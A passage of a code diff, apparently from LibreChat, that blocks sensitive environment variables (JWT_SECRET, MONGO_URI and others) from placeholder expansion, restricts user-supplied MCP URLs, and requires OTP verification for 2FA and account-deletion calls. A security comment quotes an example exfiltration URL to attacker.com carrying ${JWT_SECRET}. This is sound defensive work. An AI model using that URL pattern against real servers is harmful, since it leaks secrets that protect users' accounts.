expect(extractEnvVariable('${MEILI_MASTER_KEY}')).toBe('${MEILI_MASTER_KEY}'); + expect(extractEnvVariable('${MONGO_URI}')).toBe('${MONGO_URI}'); + expect(extractEnvVariable('${REDIS_URI}')).toBe('${REDIS_URI}'); + expect(extractEnvVariable('${REDIS_PASSWORD}')).toBe('${REDIS_PASSWORD}'); + }); + + it('should refuse to resolve sensitive vars in composite strings (multi-match path)', () => { + expect(extractEnvVariable('key=${JWT_SECRET}&more')).toBe('key=${JWT_SECRET}&more'); + expect(extractEnvVariable('db=${MONGO_URI}/extra')).toBe('db=${MONGO_URI}/extra'); + }); + + it('should still resolve non-sensitive vars normally', () => { + expect(extractEnvVariable('${OPENAI_API_KEY}')).toBe('sk-legit-key'); + expect(extractEnvVariable('Bearer ${OPENAI_API_KEY}')).toBe('Bearer sk-legit-key'); + }); + + it('should resolve non-sensitive vars while blocking sensitive ones in the same string', () => { + expect(extractEnvVariable('key=${OPENAI_API_KEY}&secret=${JWT_SECRET}')).toBe( + 'key=sk-legit-key&secret=${JWT_SECRET}', + ); + }); + }); }); diff --git a/packages/data-provider/src/accessPermissions.ts b/packages/data-provider/src/accessPermissions.ts index f2431fcf9a..bc97458076 100644 --- a/packages/data-provider/src/accessPermissions.ts +++ b/packages/data-provider/src/accessPermissions.ts @@ -200,9 +200,9 @@ export type TUpdateResourcePermissionsResponse = z.infer< * Principal search request parameters */ export type TPrincipalSearchParams = { - q: string; // search query (required) - limit?: number; // max results (1-50, default 10) - type?: PrincipalType.USER | PrincipalType.GROUP | PrincipalType.ROLE; // filter by type (optional) + q: string; + limit?: number; + types?: Array; }; /** @@ -228,7 +228,7 @@ export type TPrincipalSearchResult = { export type TPrincipalSearchResponse = { query: string; limit: number; - type?: PrincipalType.USER | PrincipalType.GROUP | PrincipalType.ROLE; + types?: Array | null; results: TPrincipalSearchResult[]; count: number; sources: { diff --git a/packages/data-provider/src/config.ts b/packages/data-provider/src/config.ts index e13521c019..bb0c180209 100644 --- a/packages/data-provider/src/config.ts +++ b/packages/data-provider/src/config.ts @@ -1560,6 +1560,10 @@ export enum ErrorTypes { * No Base URL Provided. */ NO_BASE_URL = 'no_base_url', + /** + * Base URL targets a restricted or invalid address (SSRF protection). + */ + INVALID_BASE_URL = 'invalid_base_url', /** * Moderation error */ diff --git a/packages/data-provider/src/data-service.ts b/packages/data-provider/src/data-service.ts index be5cccd43b..2c7a402d1f 100644 --- a/packages/data-provider/src/data-service.ts +++ b/packages/data-provider/src/data-service.ts @@ -21,8 +21,8 @@ export function revokeAllUserKeys(): Promise { return request.delete(endpoints.revokeAllUserKeys()); } -export function deleteUser(): Promise { - return request.delete(endpoints.deleteUser()); +export function deleteUser(payload?: t.TDeleteUserRequest): Promise { + return request.deleteWithOptions(endpoints.deleteUser(), { data: payload }); } export type FavoriteItem = { @@ -970,8 +970,8 @@ export function updateFeedback( } // 2FA -export function enableTwoFactor(): Promise { - return request.get(endpoints.enableTwoFactor()); +export function enableTwoFactor(payload?: t.TEnable2FARequest): Promise { + return request.post(endpoints.enableTwoFactor(), payload); } export function verifyTwoFactor(payload: t.TVerify2FARequest): Promise { @@ -986,8 +986,10 @@ export function disableTwoFactor(payload?: t.TDisable2FARequest): Promise { - return request.post(endpoints.regenerateBackupCodes()); +export function regenerateBackupCodes( + payload?: t.TRegenerateBackupCodesRequest, +): Promise { + return request.post(endpoints.regenerateBackupCodes(), payload); } export function verifyTwoFactorTemp( diff --git a/packages/data-provider/src/file-config.spec.ts b/packages/data-provider/src/file-config.spec.ts index 018b4dbfcf..0ab9f23a3e 100644 --- a/packages/data-provider/src/file-config.spec.ts +++ b/packages/data-provider/src/file-config.spec.ts @@ -1,15 +1,52 @@ import type { FileConfig } from './types/files'; import { fileConfig as baseFileConfig, + documentParserMimeTypes, getEndpointFileConfig, - mergeFileConfig, applicationMimeTypes, defaultOCRMimeTypes, - documentParserMimeTypes, supportedMimeTypes, + mergeFileConfig, + inferMimeType, + textMimeTypes, } from './file-config'; import { EModelEndpoint } from './schemas'; +describe('inferMimeType', () => { + it('should normalize text/x-python-script to text/x-python', () => { + expect(inferMimeType('test.py', 'text/x-python-script')).toBe('text/x-python'); + }); + + it('should return a type that matches textMimeTypes after normalization', () => { + const normalized = inferMimeType('test.py', 'text/x-python-script'); + expect(textMimeTypes.test(normalized)).toBe(true); + }); + + it('should pass through standard browser types unchanged', () => { + expect(inferMimeType('test.py', 'text/x-python')).toBe('text/x-python'); + expect(inferMimeType('doc.pdf', 'application/pdf')).toBe('application/pdf'); + }); + + it('should infer from extension when browser type is empty', () => { + expect(inferMimeType('test.py', '')).toBe('text/x-python'); + expect(inferMimeType('code.js', '')).toBe('text/javascript'); + expect(inferMimeType('photo.heic', '')).toBe('image/heic'); + }); + + it('should return empty string for unknown extension with no browser type', () => { + expect(inferMimeType('file.xyz', '')).toBe(''); + }); + + it('should produce a type accepted by checkType after normalizing text/x-python-script', () => { + const normalized = inferMimeType('test.py', 'text/x-python-script'); + expect(baseFileConfig.checkType(normalized)).toBe(true); + }); + + it('should reject raw text/x-python-script without normalization', () => { + expect(baseFileConfig.checkType('text/x-python-script')).toBe(false); + }); +}); + describe('applicationMimeTypes', () => { const odfTypes = [ 'application/vnd.oasis.opendocument.text', diff --git a/packages/data-provider/src/file-config.ts b/packages/data-provider/src/file-config.ts index 033c868a80..67b4197958 100644 --- a/packages/data-provider/src/file-config.ts +++ b/packages/data-provider/src/file-config.ts @@ -357,15 +357,21 @@ export const imageTypeMapping: { [key: string]: string } = { heif: 'image/heif', }; +/** Normalizes non-standard MIME types that browsers may report to their canonical forms */ +export const mimeTypeAliases: Readonly> = { + 'text/x-python-script': 'text/x-python', +}; + /** - * Infers the MIME type from a file's extension when the browser doesn't recognize it - * @param fileName - The name of the file including extension - * @param currentType - The current MIME type reported by the browser (may be empty) - * @returns The inferred MIME type if browser didn't provide one, otherwise the original type + * Infers the MIME type from a file's extension when the browser doesn't recognize it, + * and normalizes known non-standard MIME type aliases to their canonical forms. + * @param fileName - The file name including its extension + * @param currentType - The MIME type reported by the browser (may be empty string) + * @returns The normalized or inferred MIME type; empty string if unresolvable */ export function inferMimeType(fileName: string, currentType: string): string { if (currentType) { - return currentType; + return mimeTypeAliases[currentType] ?? currentType; } const extension = fileName.split('.').pop()?.toLowerCase() ?? ''; diff --git a/packages/data-provider/src/mcp.ts b/packages/data-provider/src/mcp.ts index b0042b3b65..2fe22525aa 100644 --- a/packages/data-provider/src/mcp.ts +++ b/packages/data-provider/src/mcp.ts @@ -226,6 +226,23 @@ const omitServerManagedFields = >(schema: T oauth_headers: true, }); +const envVarPattern = /\$\{[^}]+\}/; +const isWsProtocol = (val: string): boolean => /^wss?:/i.test(val); +const isHttpProtocol = (val: string): boolean => /^https?:/i.test(val); + +/** + * Builds a URL schema for user input that rejects ${VAR} env variable patterns + * and validates protocol constraints without resolving environment variables. + */ +const userUrlSchema = (protocolCheck: (val: string) => boolean, message: string) => + z + .string() + .refine((val) => !envVarPattern.test(val), { + message: 'Environment variable references are not allowed in URLs', + }) + .pipe(z.string().url()) + .refine(protocolCheck, { message }); + /** * MCP Server configuration that comes from UI/API input only. * Omits server-managed fields like startup, timeout, customUserVars, etc. @@ -235,11 +252,23 @@ const omitServerManagedFields = >(schema: T * Stdio allows arbitrary command execution and should only be configured * by administrators via the YAML config file (librechat.yaml). * Only remote transports (SSE, HTTP, WebSocket) are allowed via the API. + * + * SECURITY: URL fields use userUrlSchema instead of the admin schemas' + * extractEnvVariable transform to prevent env variable exfiltration + * through user-controlled URLs (e.g. http://attacker.com/?k=${JWT_SECRET}). + * Protocol checks use positive allowlists (http(s) / ws(s)) to block + * file://, ftp://, javascript:, and other non-network schemes. */ export const MCPServerUserInputSchema = z.union([ - omitServerManagedFields(WebSocketOptionsSchema), - omitServerManagedFields(SSEOptionsSchema), - omitServerManagedFields(StreamableHTTPOptionsSchema), + omitServerManagedFields(WebSocketOptionsSchema).extend({ + url: userUrlSchema(isWsProtocol, 'WebSocket URL must use ws:// or wss://'), + }), + omitServerManagedFields(SSEOptionsSchema).extend({ + url: userUrlSchema(isHttpProtocol, 'SSE URL must use http:// or https://'), + }), + omitServerManagedFields(StreamableHTTPOptionsSchema).extend({ + url: userUrlSchema(isHttpProtocol, 'Streamable HTTP URL must use http:// or https://'), + }), ]); export type MCPServerUserInput = z.infer; diff --git a/packages/data-provider/src/types.ts b/packages/data-provider/src/types.ts index 3b04c40f45..5895fba321 100644 --- a/packages/data-provider/src/types.ts +++ b/packages/data-provider/src/types.ts @@ -425,28 +425,29 @@ export type TLoginResponse = { tempToken?: string; }; +/** Shared payload for any operation that requires OTP or backup-code verification. */ +export type TOTPVerificationPayload = { + token?: string; + backupCode?: string; +}; + +export type TEnable2FARequest = TOTPVerificationPayload; + export type TEnable2FAResponse = { otpauthUrl: string; backupCodes: string[]; message?: string; }; -export type TVerify2FARequest = { - token?: string; - backupCode?: string; -}; +export type TVerify2FARequest = TOTPVerificationPayload; export type TVerify2FAResponse = { message: string; }; -/** - * For verifying 2FA during login with a temporary token. - */ -export type TVerify2FATempRequest = { +/** For verifying 2FA during login with a temporary token. */ +export type TVerify2FATempRequest = TOTPVerificationPayload & { tempToken: string; - token?: string; - backupCode?: string; }; export type TVerify2FATempResponse = { @@ -455,30 +456,22 @@ export type TVerify2FATempResponse = { message?: string; }; -/** - * Request for disabling 2FA. - */ -export type TDisable2FARequest = { - token?: string; - backupCode?: string; -}; +export type TDisable2FARequest = TOTPVerificationPayload; -/** - * Response from disabling 2FA. - */ export type TDisable2FAResponse = { message: string; }; -/** - * Response from regenerating backup codes. - */ +export type TRegenerateBackupCodesRequest = TOTPVerificationPayload; + export type TRegenerateBackupCodesResponse = { - message: string; + message?: string; backupCodes: string[]; - backupCodesHash: string[]; + backupCodesHash: TBackupCode[]; }; +export type TDeleteUserRequest = TOTPVerificationPayload; + export type TRequestPasswordReset = { email: string; }; diff --git a/packages/data-provider/src/utils.ts b/packages/data-provider/src/utils.ts index 57abbf0495..1eefcff8c4 100644 --- a/packages/data-provider/src/utils.ts +++ b/packages/data-provider/src/utils.ts @@ -1,5 +1,29 @@ export const envVarRegex = /^\${(.+)}$/; +/** + * Infrastructure env vars that must never be resolved via placeholder expansion. + * These are internal secrets whose exposure would compromise the system — + * they have no legitimate reason to appear in outbound headers, MCP env/args, or OAuth config. + * + * Intentionally excludes API keys (operators reference them in config) and + * OAuth/session secrets (referenced in MCP OAuth config via processMCPEnv). + */ +const SENSITIVE_ENV_VARS = new Set([ + 'JWT_SECRET', + 'JWT_REFRESH_SECRET', + 'CREDS_KEY', + 'CREDS_IV', + 'MEILI_MASTER_KEY', + 'MONGO_URI', + 'REDIS_URI', + 'REDIS_PASSWORD', +]); + +/** Returns true when `varName` refers to an infrastructure secret that must not leak. */ +export function isSensitiveEnvVar(varName: string): boolean { + return SENSITIVE_ENV_VARS.has(varName); +} + /** Extracts the environment variable name from a template literal string */ export function extractVariableName(value: string): string | null { if (!value) { @@ -16,21 +40,20 @@ export function extractEnvVariable(value: string) { return value; } - // Trim the input const trimmed = value.trim(); - // Special case: if it's just a single environment variable const singleMatch = trimmed.match(envVarRegex); if (singleMatch) { const varName = singleMatch[1]; + if (isSensitiveEnvVar(varName)) { + return trimmed; + } return process.env[varName] || trimmed; } - // For multiple variables, process them using a regex loop const regex = /\${([^}]+)}/g; let result = trimmed; - // First collect all matches and their positions const matches = []; let match; while ((match = regex.exec(trimmed)) !== null) { @@ -41,12 +64,12 @@ export function extractEnvVariable(value: string) { }); } - // Process matches in reverse order to avoid position shifts for (let i = matches.length - 1; i >= 0; i--) { const { fullMatch, varName, index } = matches[i]; + if (isSensitiveEnvVar(varName)) { + continue; + } const envValue = process.env[varName] || fullMatch; - - // Replace at exact position result = result.substring(0, index) + envValue + result.substring(index + fullMatch.length); } diff --git a/packages/data-schemas/src/models/plugins/mongoMeili.ts b/packages/data-schemas/src/models/plugins/mongoMeili.ts index 66530e2aba..cc01dbb6c7 100644 --- a/packages/data-schemas/src/models/plugins/mongoMeili.ts +++ b/packages/data-schemas/src/models/plugins/mongoMeili.ts @@ -1,7 +1,7 @@ import _ from 'lodash'; -import { MeiliSearch } from 'meilisearch'; import { parseTextParts } from 'librechat-data-provider'; -import type { SearchResponse, SearchParams, Index } from 'meilisearch'; +import { MeiliSearch, MeiliSearchTimeOutError } from 'meilisearch'; +import type { SearchResponse, SearchParams, Index, MeiliSearchErrorInfo } from 'meilisearch'; import type { CallbackWithoutResultAndOptionalError, FilterQuery, @@ -581,7 +581,6 @@ export default function mongoMeili(schema: Schema, options: MongoMeiliOptions): /** Create index only if it doesn't exist */ const index = client.index(indexName); - // Check if index exists and create if needed (async () => { try { await index.getRawInfo(); @@ -591,18 +590,34 @@ export default function mongoMeili(schema: Schema, options: MongoMeiliOptions): if (errorCode === 'index_not_found') { try { logger.info(`[mongoMeili] Creating new index: ${indexName}`); - await client.createIndex(indexName, { primaryKey }); - logger.info(`[mongoMeili] Successfully created index: ${indexName}`); + const enqueued = await client.createIndex(indexName, { primaryKey }); + const task = await client.waitForTask(enqueued.taskUid, { + timeOutMs: 10000, + intervalMs: 100, + }); + logger.debug(`[mongoMeili] Index ${indexName} creation task:`, task); + if (task.status !== 'succeeded') { + const taskError = task.error as MeiliSearchErrorInfo | null; + if (taskError?.code === 'index_already_exists') { + logger.debug(`[mongoMeili] Index ${indexName} was created by another instance`); + } else { + logger.warn(`[mongoMeili] Index ${indexName} creation failed:`, taskError); + } + } else { + logger.info(`[mongoMeili] Successfully created index: ${indexName}`); + } } catch (createError) { - // Index might have been created by another instance - logger.debug(`[mongoMeili] Index ${indexName} may already exist:`, createError); + if (createError instanceof MeiliSearchTimeOutError) { + logger.warn(`[mongoMeili] Timed out waiting for index ${indexName} creation`); + } else { + logger.warn(`[mongoMeili] Error creating index ${indexName}:`, createError); + } } } else { logger.error(`[mongoMeili] Error checking index ${indexName}:`, error); } } - // Configure index settings to make 'user' field filterable try { await index.updateSettings({ filterableAttributes: ['user'], diff --git a/packages/data-schemas/src/schema/user.ts b/packages/data-schemas/src/schema/user.ts index c2bdc6fd34..57c8f8574e 100644 --- a/packages/data-schemas/src/schema/user.ts +++ b/packages/data-schemas/src/schema/user.ts @@ -121,6 +121,15 @@ const userSchema = new Schema( type: [BackupCodeSchema], select: false, }, + pendingTotpSecret: { + type: String, + select: false, + }, + pendingBackupCodes: { + type: [BackupCodeSchema], + select: false, + default: undefined, + }, refreshToken: { type: [SessionSchema], }, diff --git a/packages/data-schemas/src/types/user.ts b/packages/data-schemas/src/types/user.ts index a78c4679f2..e1cecb7518 100644 --- a/packages/data-schemas/src/types/user.ts +++ b/packages/data-schemas/src/types/user.ts @@ -26,6 +26,12 @@ export interface IUser extends Document { used: boolean; usedAt?: Date | null; }>; + pendingTotpSecret?: string; + pendingBackupCodes?: Array<{ + codeHash: string; + used: boolean; + usedAt?: Date | null; + }>; refreshToken?: Array<{ refreshToken: string; }>;